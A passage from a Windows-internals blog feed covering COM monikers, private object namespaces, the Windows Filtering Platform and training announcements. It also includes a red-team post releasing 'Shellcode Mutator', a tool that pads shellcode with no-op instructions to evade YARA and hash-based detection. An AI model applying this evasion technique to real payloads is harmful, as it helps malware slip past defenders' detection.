	DECLARE_GET_CONTROLLING_UNKNOWN()

	HRESULT FinalConstruct() {
		return CoCreateFreeThreadedMarshaler(
			GetControllingUnknown(), &m_pUnkMarshaler.p);
	}

	void FinalRelease() {
		m_pUnkMarshaler.Release();
		if (m_hProcess)
			::CloseHandle(m_hProcess);
	}

	void SetHandle(HANDLE hProcess);

private:
	HANDLE m_hProcess{ nullptr };
	CComPtr<IUnknown> m_pUnkMarshaler;

	// Inherited via IWinProcess
	HRESULT get_Id(DWORD* pId);
	HRESULT get_ImagePath(BSTR* path);
	HRESULT Terminate(DWORD exitCode);
};

The two properties and one method look like this:

void CWinProcess::SetHandle(HANDLE hProcess) {
	m_hProcess = hProcess;
}

HRESULT CWinProcess::get_Id(DWORD* pId) {
	ATLASSERT(m_hProcess);
	return *pId = ::GetProcessId(m_hProcess), S_OK;
}

HRESULT CWinProcess::get_ImagePath(BSTR* pPath) {
	WCHAR path[MAX_PATH];
	DWORD size = _countof(path);
	if (::QueryFullProcessImageName(m_hProcess, 0, path, &size))
		return CComBSTR(path).CopyTo(pPath);

	return HRESULT_FROM_WIN32(::GetLastError());
}

HRESULT CWinProcess::Terminate(DWORD exitCode) {
	HANDLE hKill;
	if (::DuplicateHandle(::GetCurrentProcess(), m_hProcess, 
		::GetCurrentProcess(), &hKill, PROCESS_TERMINATE, FALSE, 0)) {
		auto success = ::TerminateProcess(hKill, exitCode);
		auto error = ::GetLastError();
		::CloseHandle(hKill);
		return success ? S_OK : HRESULT_FROM_WIN32(error);
	}
	return HRESULT_FROM_WIN32(::GetLastError());
}

The APIs used above are fairly straightforward and of course fully documented.

The last piece of the puzzle is the moniker’s class factory:

class ATL_NO_VTABLE CMonikerClassFactory : 
	public ATL::CComObjectRootEx<ATL::CComMultiThreadModel>,
	public IParseDisplayName {
public:
	BEGIN_COM_MAP(CMonikerClassFactory)
		COM_INTERFACE_ENTRY(IParseDisplayName)
	END_COM_MAP()

	// Inherited via IParseDisplayName
	HRESULT __stdcall ParseDisplayName(IBindCtx* pbc, LPOLESTR pszDisplayName, ULONG* pchEaten, IMoniker** ppmkOut) override;
};

Just one method to implement:

HRESULT __stdcall CMonikerClassFactory::ParseDisplayName(
    IBindCtx* pbc, LPOLESTR pszDisplayName, 
    ULONG* pchEaten, IMoniker** ppmkOut) {
    auto colon = wcschr(pszDisplayName, L':');
    ATLASSERT(colon);
    if (colon == nullptr)
        return E_INVALIDARG;

    //
    // simplistic, assume all display name consumed
    //
    *pchEaten = (ULONG)wcslen(pszDisplayName);

    CComObject<CProcessMoniker>* pMon;
    auto hr = CComObject<CProcessMoniker>::CreateInstance(&pMon);
    if (FAILED(hr))
        return hr;

    //
    // provide the process ID
    //
    pMon->m_DisplayName = colon + 1;
    pMon->AddRef();
    hr = pMon->QueryInterface(ppmkOut);
    pMon->Release();
    return hr;
}

First, the colon is searched for, as the display name looks like “process:xxxx”. The “xxxx” part is stored in the resulting moniker, created with CComObject<>, similarly to the CWinProcess earlier. The pchEaten value reports back how many characters were consumed – the moniker factory should parse as much as it understands, because moniker composition may be in play. Hopefully, I’ll discuss that in a future post.

Finally, registration must be added for the moniker. Here is ProcessMoniker.rgs, where the lower part was added to connect the “process” ProgId/moniker name to the CLSID of the process moniker:

HKCR
{
	NoRemove CLSID
	{
		ForceRemove {6ea3a80e-2936-43be-8725-2e95896da9a4} = s 'ProcessMoniker class'
		{
			InprocServer32 = s '%MODULE%'
			{
				val ThreadingModel = s 'Both'
			}
			TypeLib = s '{97a86fc5-ffef-4e80-88a0-fa3d1b438075}'
			Version = s '1.0'
		}
	}
	process = s 'Process Moniker Class'
	{
		CLSID = s '{6ea3a80e-2936-43be-8725-2e95896da9a4}'
	}
}

And that is it. Here is an example client that terminates a process given its ID:

void Kill(DWORD pid) {
	std::wstring displayName(L"process:");
	displayName += std::to_wstring(pid);
	BIND_OPTS opts{ sizeof(opts) };
	CComPtr<IWinProcess> spProcess;
	auto hr = ::CoGetObject(displayName.c_str(), &opts, 
		__uuidof(IWinProcess), reinterpret_cast<void**>(&spProcess));
	if (SUCCEEDED(hr)) {
		auto hr = spProcess->Terminate(1);
		if (SUCCEEDED(hr))
			printf("Process %u terminated.\n", pid);
		else
			printf("Error terminating process: hr=0x%X\n", hr);
	}
}

All the code can be found in this Github repo: zodiacon/MonikerFun: Demonstrating a simple moniker. (github.com)

Here is VBScript example (this works because WinProcess implements IDispatch):

set process = GetObject("process:25520")
MsgBox process.ImagePath

How about .NET or PowerShell? Here is Powershell:

PS> $p = [System.Runtime.InteropServices.Marshal]::BindToMoniker("process:25520")
PS> $p | Get-Member                                                                                             

   TypeName: System.__ComObject#{3ab0471f-2635-429d-95e9-f2baede2859e}

Name      MemberType Definition
----      ---------- ----------
Terminate Method     void Terminate (uint)
Id        Property   uint Id () {get}
ImagePath Property   string ImagePath () {get}


PS> $p.ImagePath
C:\Windows\System32\notepad.exe

The DisplayWindows function just displays names of Explorer windows obtained by using IShellWindows:

void DisplayWindows(IShellWindows* pShell) {
	long count = 0;
	pShell->get_Count(&count);
	for (long i = 0; i < count; i++) {
		CComPtr<IDispatch> spDisp;
		pShell->Item(CComVariant(i), &spDisp);
		CComQIPtr<IWebBrowserApp> spWin(spDisp);
		if (spWin) {
			CComBSTR name;
			spWin->get_LocationName(&name);
			printf("Name: %ws\n", name.m_str);
		}
	}
}

Happy Moniker day!

Next Windows Internals Training

1 October 2022 at 03:04

I’m happy to open registration for the next 5 day Windows Internals training to be conducted in November in the following dates and from 11am to 7pm, Eastern Standard Time (EST) (8am to 4pm PST): 21, 22, 28, 29, 30.

The syllabus can be found here (some modifications possible, but the general outline should remain).

Training cost is 900 USD if paid by an individual, or 1800 USD if paid by a company. Participants in any of my previous training classes get 10% off.

If you’d like to register, please send me an email to [email protected] with “Windows Internals training” in the title, provide your full name, company (if any), preferred contact email, and your time zone.

The sessions will be recorded, so you can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Upcoming COM Programming Class

3 December 2022 at 18:11

Today I’m happy to announce the next COM Programming class to be held in February 2023. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: February (7, 8, 9, 14, 15, 16).
Times: 11am to 3pm EST (8am to 12pm PST) (4pm to 8pm UT)
Cost: 750 USD (if paid by an individual), 1400 USD (if paid by a company).

Half days should make it comfortable enough even if you’re not in an ideal time zone.

The class will be conducted remotely using Microsoft Teams.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Programming Training”, and write the name(s), email(s) and time zone(s) of the participants.

Unnamed Directory Objects

13 December 2022 at 03:33

A lot of the functionality in Windows is based around various kernel objects. One such object is a Directory, not to be confused with a directory in a file system. A Directory object is conceptually simple: it’s a container for other kernel objects, including other Directory objects, thus creating a hierarchy used by the kernel’s Object Manager to manage named objects. This arrangement can be easily seen with tools like WinObj from Sysinternals:

The left part of WinObj shows object manager directories, where named objects are “stored” and can be located by name. Clear and simple enough.

However, Directory objects can be unnamed as well as named. How can this be? Here is my Object Explorer tool (similar functionality is available with my System Explorer tool as well). One of its views is a “statistical” view of all object types, showing some of their properties, such as their name, type index, number of objects and handles, peak number of objects and handles, generic access mapping, and the pool type they’re allocated from.

If you right-click the Directory object type and select “All Objects”, you’ll see another view that shows all Directory objects in the system (well, not necessarily all, but most*).

If you scroll a bit, you’ll see many Directory objects that have no name:

It seems weird, as a Directory with no name doesn’t make sense. These directories, however, are “real” and serve an important purpose – managing a private object namespace. I blogged about private object namespaces quite a few years ago (it was in my old blog site that is now unfortunately lost), but here is the gist of it:

Object names are useful because they allow easy sharing between processes. For example, if two or more processes would like to share memory, they can create a memory mapped file object (called Section within the kernel) with a name they are all aware of. Calling CreateFileMapping (or one of its variants) with the same name will create the object (by the first caller), where subsequent callers get handles to the existing object because it was looked up by name.

This is easy and useful, but there is a possible catch: since the name is “visible” using tools or APIs, other processes can “interfere” with the object by getting their own handle using that visible name and “meddle” with the object, maliciously or accidentally.

The solution to this problem arrived in Windows Vista with the idea of private object namespaces. A set of cooperating processes can create a private namespace only they can use, protected by a “secret” name and more importantly a boundary descriptor. The details are beyond the scope of this post, but it’s all documented in the Windows API functions such as CreateBoundaryDescriptor, CreatePrivateNamespace and friends. Here is an example of using these APIs to create a private namespace with a section object in it (error handling omitted):

HANDLE hBD = ::CreateBoundaryDescriptor(L"MyDescriptor", 0);
BYTE sid[SECURITY_MAX_SID_SIZE];
auto psid = reinterpret_cast<PSID>(sid);
DWORD sidLen = sizeof(sid);
::CreateWellKnownSid(WinBuiltinUsersSid, nullptr, psid, &sidLen);
::AddSIDToBoundaryDescriptor(&hBD, psid);

// create the private namespace
HANDLE hNamespace = ::CreatePrivateNamespace(nullptr, hBD, L"MyNamespace");
if (!hNamespace) { // maybe created already?
	hNamespace = ::OpenPrivateNamespace(hBD, L"MyNamespace");
}

HANDLE hSharedMem = ::CreateFileMapping(INVALID_HANDLE_VALUE, nullptr, PAGE_READWRITE, 0, 1 << 12, L"MyNamespace\\MySharedMem");

This snippet is taken from the PrivateSharing code example from the Windows 10 System Programming part 1 book.
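
For completeness, a second cooperating process could open the same section roughly like this – again with error handling omitted. This sketch is based on the same documented APIs rather than taken from the book sample; the opener must rebuild a matching boundary descriptor before it can open the namespace:

HANDLE hBD = ::CreateBoundaryDescriptor(L"MyDescriptor", 0);
BYTE sid[SECURITY_MAX_SID_SIZE];
auto psid = reinterpret_cast<PSID>(sid);
DWORD sidLen = sizeof(sid);
::CreateWellKnownSid(WinBuiltinUsersSid, nullptr, psid, &sidLen);
::AddSIDToBoundaryDescriptor(&hBD, psid);

HANDLE hNamespace = ::OpenPrivateNamespace(hBD, L"MyNamespace");

HANDLE hSharedMem = ::OpenFileMapping(FILE_MAP_READ | FILE_MAP_WRITE, FALSE,
	L"MyNamespace\\MySharedMem");
void* p = ::MapViewOfFile(hSharedMem, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);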

If you run this demo application and look at the resulting handle (hSharedMem) in a tool like Process Explorer or Object Explorer, you’ll see that the name of the object is not given:

The full name is not shown and cannot be retrieved from user mode. And even if it could somehow be located, the boundary descriptor provides further protection. Let’s examine this object in the kernel debugger. Copying its address from the object’s properties:

Pasting the address into a local kernel debugger – first using the generic !object command:

lkd> !object 0xFFFFB3068E162D10
Object: ffffb3068e162d10  Type: (ffff9507ed78c220) Section
    ObjectHeader: ffffb3068e162ce0 (new version)
    HandleCount: 1  PointerCount: 32769
    Directory Object: ffffb3069e8cbe00  Name: MySharedMem

The name is there, but the directory object is there as well. Let’s examine it:

lkd> !object ffffb3069e8cbe00
Object: ffffb3069e8cbe00  Type: (ffff9507ed6d0d20) Directory
    ObjectHeader: ffffb3069e8cbdd0 (new version)
    HandleCount: 3  PointerCount: 98300

    Hash Address          Type                      Name
    ---- -------          ----                      ----
     19  ffffb3068e162d10 Section                   MySharedMem

There is one object in this directory. What’s the directory’s name? We need to examine the object header for that – its address is given in the above output:

lkd> dt nt!_OBJECT_HEADER ffffb3069e8cbdd0
   +0x000 PointerCount     : 0n32769
   +0x008 HandleCount      : 0n1
   +0x008 NextToFree       : 0x00000000`00000001 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0x53 'S'
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0x8 ''
   +0x01b Flags            : 0 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y0
   +0x01b KernelOnlyAccess : 0y0
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y0
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Reserved         : 0x301
   +0x020 ObjectCreateInfo : 0xffff9508`18f2ba40 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0xffff9508`18f2ba40 Void
   +0x028 SecurityDescriptor : 0xffffb305`dd0d56ed Void
   +0x030 Body             : _QUAD

Getting a kernel object’s name is a little tricky, and will not be fully described here. The first requirement is that the InfoMask member must have bit 1 set (value of 2), as this indicates a name is present. Since it’s not set (the value is 8), there is no name for this directory. We can examine the directory object in more detail by looking at the real data structure underneath, given the object’s original address:

kd> dt nt!_OBJECT_DIRECTORY ffffb3069e8cbe00
   +0x000 HashBuckets      : [37] (null) 
   +0x128 Lock             : _EX_PUSH_LOCK
   +0x130 DeviceMap        : (null) 
   +0x138 ShadowDirectory  : (null) 
   +0x140 NamespaceEntry   : 0xffffb306`9e8cbf58 Void
   +0x148 SessionObject    : (null) 
   +0x150 Flags            : 1
   +0x154 SessionId        : 0xffffffff

The interesting piece is the NamespaceEntry member, which is not NULL. This indicates the purpose of this directory: to be a container for a private namespace’s objects. You can also click on HashBuckets and locate the single section object there.

Going back to Process Explorer, enabling unnamed object handles (View menu, Show Unnamed Handles and Mappings) and looking for unnamed directory objects:

The directory’s address is the same one we were looking at!

The pointer at NamespaceEntry points to an undocumented structure that is not currently provided with the symbols. But just looking a bit beyond the directory’s object structure shows a hint:

lkd> db ffffb3069e8cbe00+158
ffffb306`9e8cbf58  d8 f9 a3 55 06 b3 ff ff-70 46 12 66 07 f8 ff ff  ...U....pF.f....
ffffb306`9e8cbf68  00 be 8c 9e 06 b3 ff ff-48 00 00 00 00 00 00 00  ........H.......
ffffb306`9e8cbf78  00 00 00 00 00 00 00 00-0b 00 00 00 00 00 00 00  ................
ffffb306`9e8cbf88  01 00 00 00 02 00 00 00-48 00 00 00 00 00 00 00  ........H.......
ffffb306`9e8cbf98  01 00 00 00 20 00 00 00-4d 00 79 00 44 00 65 00  .... ...M.y.D.e.
ffffb306`9e8cbfa8  73 00 63 00 72 00 69 00-70 00 74 00 6f 00 72 00  s.c.r.i.p.t.o.r.
ffffb306`9e8cbfb8  02 00 00 00 18 00 00 00-01 02 00 00 00 00 00 05  ................
ffffb306`9e8cbfc8  20 00 00 00 21 02 00 00-00 00 00 00 00 00 00 00   ...!...........

The name “MyDescriptor” is clearly visible, which is the name of the boundary descriptor in the above code.

The kernel debugger’s documentation indicates that the !object command with a -p switch should show the private namespaces. However, this fails:

lkd> !object -p
00000000: Unable to get value of ObpPrivateNamespaceLookupTable

The debugger seems to fail locating a global kernel variable. This is probably a bug in the debugger command, because the scope of object namespaces has changed since the introduction of Server Silos in Windows 10 version 1607 (for example, Docker uses these when running Windows containers). Each silo has its own object manager namespace, so the old global variable does not exist anymore. I suspect Microsoft has not updated this command switch to support silos. Even with no server silos running, the host is considered to be in its own (global) silo, called the host silo. You can see its details by utilizing the !silo debugger command:

kd> !silo -g host
Server silo globals fffff80766124540:
		Default Error Port: ffff950815bee140
		ServiceSessionId  : 0
		OB Root Directory : 
		State             : Running

Clicking the “Server silo globals” link shows more details:

kd> dx -r1 (*((nt!_ESERVERSILO_GLOBALS *)0xfffff80766124540))
(*((nt!_ESERVERSILO_GLOBALS *)0xfffff80766124540))                 [Type: _ESERVERSILO_GLOBALS]
    [+0x000] ObSiloState      [Type: _OBP_SILODRIVERSTATE]
    [+0x2e0] SeSiloState      [Type: _SEP_SILOSTATE]
    [+0x310] SeRmSiloState    [Type: _SEP_RM_LSA_CONNECTION_STATE]
    [+0x360] EtwSiloState     : 0xffff9507edbc9000 [Type: _ETW_SILODRIVERSTATE *]
    [+0x368] MiSessionLeaderProcess : 0xffff95080bbdb040 [Type: _EPROCESS *]
    [+0x370] ExpDefaultErrorPortProcess : 0xffff950815bee140 [Type: _EPROCESS *]
<truncated>

ObSiloState is the root object related to the object manager. Clicking this one shows:

lkd> dx -r1 (*((ntkrnlmp!_OBP_SILODRIVERSTATE *)0xfffff80766124540))
(*((ntkrnlmp!_OBP_SILODRIVERSTATE *)0xfffff80766124540))                 [Type: _OBP_SILODRIVERSTATE]
    [+0x000] SystemDeviceMap  : 0xffffb305c8c48720 [Type: _DEVICE_MAP *]
    [+0x008] SystemDosDeviceState [Type: _OBP_SYSTEM_DOS_DEVICE_STATE]
    [+0x078] DeviceMapLock    [Type: _EX_PUSH_LOCK]
    [+0x080] PrivateNamespaceLookupTable [Type: _OBJECT_NAMESPACE_LOOKUPTABLE]

PrivateNamespaceLookupTable is the root object for the private namespaces for this Silo (in this example it’s the host silo).

The interested reader is welcome to dig into this further.

The list of private namespaces is provided with the WinObjEx64 tool if you run it elevated and have local kernel debugging enabled, as it uses the kernel debugger’s driver to read kernel memory.

* Most objects, because the way Object Explorer works is by enumerating handles and associating them with objects. However, some objects are held using references from the kernel with zero handles. Such objects cannot be detected by Object Explorer.

Avoiding Detection with Shellcode Mutator

By: Rob Bone
21 December 2022 at 09:00

Today we are releasing a new tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious.

Download Shellcode Mutator

GitHub: https://github.com/nettitude/ShellcodeMutator

Background

One of the main benefits of writing your shellcode in assembly is that you have full control over the structure of the shellcode.

For example, the content and order of the functions in the source file can (obviously) be changed and the code compiled to produce a new version of your shellcode. These changes don’t have to be functional however, we can use automated tools to mutate the shellcode source so that each time we compile it the functionality stays the same, but the contents are changed.

This then means that the resultant shellcode will have a different size, file hash, byte order etc, which will make it harder to reliably detect both statically and in memory.

This ability is orthogonal to shellcode encryption and encoding: at some point the encrypted and encoded shellcode needs to be decrypted and decoded so that it can actually be executed, and at that point it may get detected.

Let’s make use of a concrete, if a little contrived, example.

Test Case

We can take the nasm source code for some MessageBox shellcode from Didier Stevens, compile it as per his instructions and inject it and we successfully get a message box – so far so good.

Testing the default shellcode.

If we were to extract this shellcode as a blue teamer and want to write detections to catch it, we might note the hash, examine the contents and the disassembly, and then write a yara rule to catch it in memory or on disk.

As shown below, we can take a quick peek at the binary using binary refinery.

Taking a quick peek at the binary using binary refinery.

We also note the sha256 hash is a8fb8c2b46ab00c0c5bc6aa8d9d6d5263a8c4d83ad465a9c50313da17c85fcb3.

Rizin can be used to examine the shellcode disassembly.

Examining the shellcode disassembly using rizin.

If we were to write a very quick yara rule for this, we may choose to focus on the initial bytes which perform some setup. Replacing the offsets (e.g. [rbx + 0x113]) with wildcards and taking the bytes up to the second call at 0x0000001b, we can write a quick yara rule that matches the shellcode in memory and on disk, but nothing else in e.g. C:\Windows\System32 (testing for false positives).

A quick-and-dirty yara rule for the shellcode.

The rule matches the shellcode on disk and in memory and triggers no false positives against anything in C:\Windows\System32.

So we have a reliable yara rule and add it to our threat hunts – all good, right?

Shellcode Mutator

This is where the Shellcode Mutator project comes in. This simple python script will parse nasm source code and insert sets of instructions at random intervals that ‘do nothing’, but will alter the byte order and file hash of the shellcode, at the cost of increased size.

The script is easy enough to use, taking a source code ‘template’, an out file, a morph percentage and a flag to set x86 vs x64 mode.

Help text for shellcode mutator.

This script has some basic logic to check source lines, but essentially has two sets of instructions that can be expanded upon, one for x86 and one for x64. Each entry in these instruction sets should, after all instructions have executed, leave all registers and flags in the same state as before they were executed, to ensure that the shellcode can continue without erroring.

The default "no instructions" sets.

Along with some other logic, the script will place these instruction sets at random intervals (dictated by the morph percentage) before the instructions specified in the assembly_instructions variable:

Instructions that are used as triggers for the mutations.

If we run the script against our MessageBox shellcode, setting a morph percentage of 15%, we get a source code file that is 57 lines instead of 53. Compiling that shellcode and executing the yara search shows that it is not caught and only the original shellcode matches.

The mutated MessageBox shellcode no longer matches our yara rule.

Examining the disassembly of the binary file shows that it has inserted a nop (0x90) instruction into the bytes that we matched upon (in addition to other places). This of course also changed the file hash.

The instruction that caused our yara rule not to match.

There is an element of luck of course. We need to make sure that we change enough bytes that any yara rules will no longer match, without actually knowing what those yara rules (or any other detections) are. Increasing the morph percentage will therefore increase the number of alterations made and the likelihood of bypassing any rules, at the cost of increased shellcode size.

Of course the big question is, does our shellcode still run?

Testing the morphed shellcode still works!

Winning!

Download Shellcode Mutator

GitHub: https://github.com/nettitude/ShellcodeMutator


Introduction to the Windows Filtering Platform

25 December 2022 at 03:25

As part of the second edition of Windows Kernel Programming, I’m working on chapter 13 to describe the basics of the Windows Filtering Platform (WFP). The chapter will focus mostly on kernel-mode WFP Callout drivers (it is a kernel programming book after all), but I am also providing a brief introduction to WFP and its user-mode API.

This introduction (with some simplifications) is what this post is about. Enjoy!

The Windows Filtering Platform (WFP) provides flexible ways to control network filtering. It exposes user-mode and kernel-mode APIs that interact with several layers of the networking stack. Some configuration and control is available directly from user-mode, without requiring any kernel-mode code (although it does require administrator-level access). WFP replaces older network filtering technologies, such as Transport Driver Interface (TDI) filters and some types of NDIS filters.

If examining (and even modifying) network packets is required, a kernel-mode Callout driver can be written, which is what we’ll be concerned with in this chapter. We’ll begin with an overview of the main pieces of WFP, and look at some user-mode code examples for configuring filters, before diving into building simple Callout drivers that allow fine-grained control over network packets.

WFP is comprised of user-mode and kernel-mode components. A very high-level architecture is shown here:

In user-mode, the WFP manager is the Base Filtering Engine (BFE), which is a service implemented by bfe.dll and hosted in a standard svchost.exe instance. It implements the WFP user-mode API, essentially managing the platform, talking to its kernel counterpart when needed. We’ll examine some of these APIs in the next section.

User-mode applications, services and other components can utilize this user-mode management API to examine WFP objects state, and make changes, such as adding or deleting filters. A classic example of such “user” is the Windows Firewall, which is normally controllable by leveraging the Microsoft Management Console (MMC) that is provided for this purpose, but using these APIs from other applications is just as effective.

The kernel-mode filter engine exposes various logical layers, where filters (and callouts) can be attached. Layers represent locations in the network processing of one or more packets. The TCP/IP driver makes calls to the WFP kernel engine so that it can decide which filters (if any) should be “invoked”.

For filters, this means checking the conditions set by the filter against the current request. If the conditions are satisfied, the filter’s action is applied. Common actions include blocking a request from being further processed, allowing the request to continue without further processing in this layer, continuing to the next filter in this layer (if any), and invoking a callout driver. Callouts can perform any kind of processing, such as examining and even modifying packet data.
The relationship between layers, filters, and callouts is shown here:

As you can see in the diagram, each layer can have zero or more filters, and zero or more callouts. The number and meaning of the layers is fixed and provided out of the box by Windows. On most systems, there are about 100 layers. Many of the layers come in pairs, where one is for IPv4 and the other (identical in purpose) is for IPv6.

The WFP Explorer tool I created provides some insight into what makes up WFP. Running the tool and selecting View/Layers from the menu (or clicking the Layers toolbar button) shows a view of all existing layers.

You can download the WFP Explorer tool from its Github repository
(https://github.com/zodiacon/WFPExplorer) or the AllTools repository
(https://github.com/zodiacon/AllTools).

Each layer is uniquely identified by a GUID. Its Layer ID is used internally by the kernel engine as an identifier rather than the GUID, as it’s smaller and so is faster (layer IDs are 16-bit only). Most layers have fields that can be used by filters to set conditions for invoking their actions. Double-clicking a layer shows its properties. The next figure shows the general properties of an example layer. Notice it has 382 filters and 2 callouts attached to it.

Clicking the Fields tab shows the fields available in this layer, which can be used by filters to set conditions.

The meaning of the various layers, and the meaning of the fields for the layers are all documented in the official WFP documentation.

The currently existing filters can be viewed in WFP Explorer by selecting Filters from the View menu. Layers cannot be added or removed, but filters can. Management code (user or kernel) can add and/or remove filters dynamically while the system is running. You can see that on the system the tool is running on there are currently 2978 filters.

Each filter is uniquely identified by a GUID, and just like layers has a “shorter” id (64-bit) that is used by the kernel engine to more quickly compare filter IDs when needed. Since multiple filters can be assigned to the same layer, some kind of ordering must be used when assessing filters. This is where the filter’s weight comes into play. A weight is a 64-bit value that is used to sort filters by priority. As you can see in figure 13-7, there are two weight properties – weight and effective weight. Weight is what is specified when adding the filter, but effective weight is the actual one used. There are three possible values to set for weight:

  • A value between 0 and 15 is interpreted by WFP as a weight index, which simply means that the effective weight’s most significant 4 bits are set to the specified value and WFP generates the other 60 bits. For example, if the weight is set to 5, then the effective weight is going to be between 0x5000000000000000 and 0x5FFFFFFFFFFFFFFF.
  • An empty value tells WFP to generate an effective weight somewhere in the 64-bit range.
  • A value above 15 is taken as is to become the effective weight.

What is an “empty” value? The weight is not really a number, but a FWP_VALUE – a type that can hold all sorts of values, including no value at all (empty).
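
As a minimal sketch (assuming a FWPM_FILTER variable named filter, prepared as in the example later in this chapter), the three weight options look roughly like this in code:

// weight index (0-15): WFP derives the effective weight from the top 4 bits
filter.weight.type = FWP_UINT8;
filter.weight.uint8 = 5;         // effective weight in 0x5000000000000000..0x5FFFFFFFFFFFFFFF

// empty value: WFP picks an effective weight on its own
filter.weight.type = FWP_EMPTY;

// explicit 64-bit weight, taken as-is
UINT64 weight = 0x6000000000000000;
filter.weight.type = FWP_UINT64;
filter.weight.uint64 = &weight;  // 64-bit values are held by pointer in FWP_VALUE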

Double-clicking a filter in WFP Explorer shows its general properties:

The Conditions tab shows the conditions this filter is configured with. When all the conditions are met, the action of the filter is going to fire.

The list of fields used by a filter must be a subset of the fields exposed by the layer this filter is attached to. There are six conditions shown in figure 13-9 out of the possible 39 fields supported by this layer (“ALE Receive/Accept v4 Layer”). As you can see, there is a lot of flexibility in specifying conditions for fields – this is evident in the matching enumeration, FWP_MATCH_TYPE:

typedef enum FWP_MATCH_TYPE_ {
    FWP_MATCH_EQUAL    = 0,
    FWP_MATCH_GREATER,
    FWP_MATCH_LESS,
    FWP_MATCH_GREATER_OR_EQUAL,
    FWP_MATCH_LESS_OR_EQUAL,
    FWP_MATCH_RANGE,
    FWP_MATCH_FLAGS_ALL_SET,
    FWP_MATCH_FLAGS_ANY_SET,
    FWP_MATCH_FLAGS_NONE_SET,
    FWP_MATCH_EQUAL_CASE_INSENSITIVE,
    FWP_MATCH_NOT_EQUAL,
    FWP_MATCH_PREFIX,
    FWP_MATCH_NOT_PREFIX,
    FWP_MATCH_TYPE_MAX
} FWP_MATCH_TYPE;

The WFP API exposes its functionality for user-mode and kernel-mode callers. The header files used are different, to cater for differences in API expectations between user-mode and kernel-mode, but the APIs are in general identical. For example, kernel APIs return NTSTATUS, whereas user-mode APIs return a simple LONG, which is the error value normally returned from GetLastError. Some APIs are provided for kernel-mode only, as they don’t make sense for user mode.

Note: the user-mode WFP APIs never set the last error, and always return the error value directly. Zero (ERROR_SUCCESS) means success, while other (positive) values mean failure. Do not call GetLastError when using WFP – just look at the returned value.

WFP functions and structures use a versioning scheme, where function and structure names end with a digit indicating the version. For example, FWPM_LAYER0 is the first version of a structure describing a layer. At the time of writing, this was the only structure for describing a layer. As a counter example, there are several versions of the function beginning with FwpmNetEventEnum: FwpmNetEventEnum0 (for Vista+), FwpmNetEventEnum1 (Windows 7+), FwpmNetEventEnum2 (Windows 8+), FwpmNetEventEnum3 (Windows 10+), FwpmNetEventEnum4 (Windows 10 RS4+), and FwpmNetEventEnum5 (Windows 10 RS5+). This is an extreme example, but there are others with fewer “versions”. You can use any version that matches the target platform. To make it easier to work with these APIs and structures, a macro is defined with the base name that expands to the maximum supported version based on the target compilation platform. Here is part of the declarations behind the FwpmNetEventEnum macro:

DWORD FwpmNetEventEnum0(
   _In_ HANDLE engineHandle,
   _In_ HANDLE enumHandle,
   _In_ UINT32 numEntriesRequested,
   _Outptr_result_buffer_(*numEntriesReturned) FWPM_NET_EVENT0*** entries,
   _Out_ UINT32* numEntriesReturned);
#if (NTDDI_VERSION >= NTDDI_WIN7)
DWORD FwpmNetEventEnum1(
   _In_ HANDLE engineHandle,
   _In_ HANDLE enumHandle,
   _In_ UINT32 numEntriesRequested,
   _Outptr_result_buffer_(*numEntriesReturned) FWPM_NET_EVENT1*** entries,
   _Out_ UINT32* numEntriesReturned);
#endif // (NTDDI_VERSION >= NTDDI_WIN7)
#if (NTDDI_VERSION >= NTDDI_WIN8)
DWORD FwpmNetEventEnum2(
   _In_ HANDLE engineHandle,
   _In_ HANDLE enumHandle,
   _In_ UINT32 numEntriesRequested,
   _Outptr_result_buffer_(*numEntriesReturned) FWPM_NET_EVENT2*** entries,
   _Out_ UINT32* numEntriesReturned);
#endif // (NTDDI_VERSION >= NTDDI_WIN8)

You can see that the differences in the functions relate to the structures returned as part of these APIs (FWPM_NET_EVENTx). It’s recommended you use the macros, and only turn to specific versions if there is a compelling reason to do so.

The WFP APIs adhere to strict naming conventions that make it easier to use. All management functions start with Fwpm (Filtering Windows Platform Management), and all management structures start with FWPM. The function names themselves use the pattern <prefix><object type><operation>, such as FwpmFilterAdd and FwpmLayerGetByKey.

It’s curious that the prefixes used for functions, structures, and enums start with FWP rather than the (perhaps) expected WFP. I couldn’t find a compelling reason for this.

WFP header files start with fwp and end with u for user-mode or k for kernel-mode. For example, fwpmu.h holds the management functions for user-mode callers, whereas fwpmk.h is the header for kernel callers. Two common files, fwptypes.h and fwpmtypes.h are used by both user-mode and kernel-mode headers. They are included by the “main” header files.

User-Mode Examples

Before making any calls to specific APIs, a handle to the WFP engine must be opened with FwpmEngineOpen:

DWORD FwpmEngineOpen0(
   _In_opt_ const wchar_t* serverName,  // must be NULL
   _In_ UINT32 authnService,            // RPC_C_AUTHN_DEFAULT
   _In_opt_ SEC_WINNT_AUTH_IDENTITY_W* authIdentity,
   _In_opt_ const FWPM_SESSION0* session,
   _Out_ HANDLE* engineHandle);

Most of the arguments have good defaults when NULL is specified. The returned handle must be used with subsequent APIs. Once it’s no longer needed, it must be closed:

DWORD FwpmEngineClose0(_Inout_ HANDLE engineHandle);

Enumerating Objects

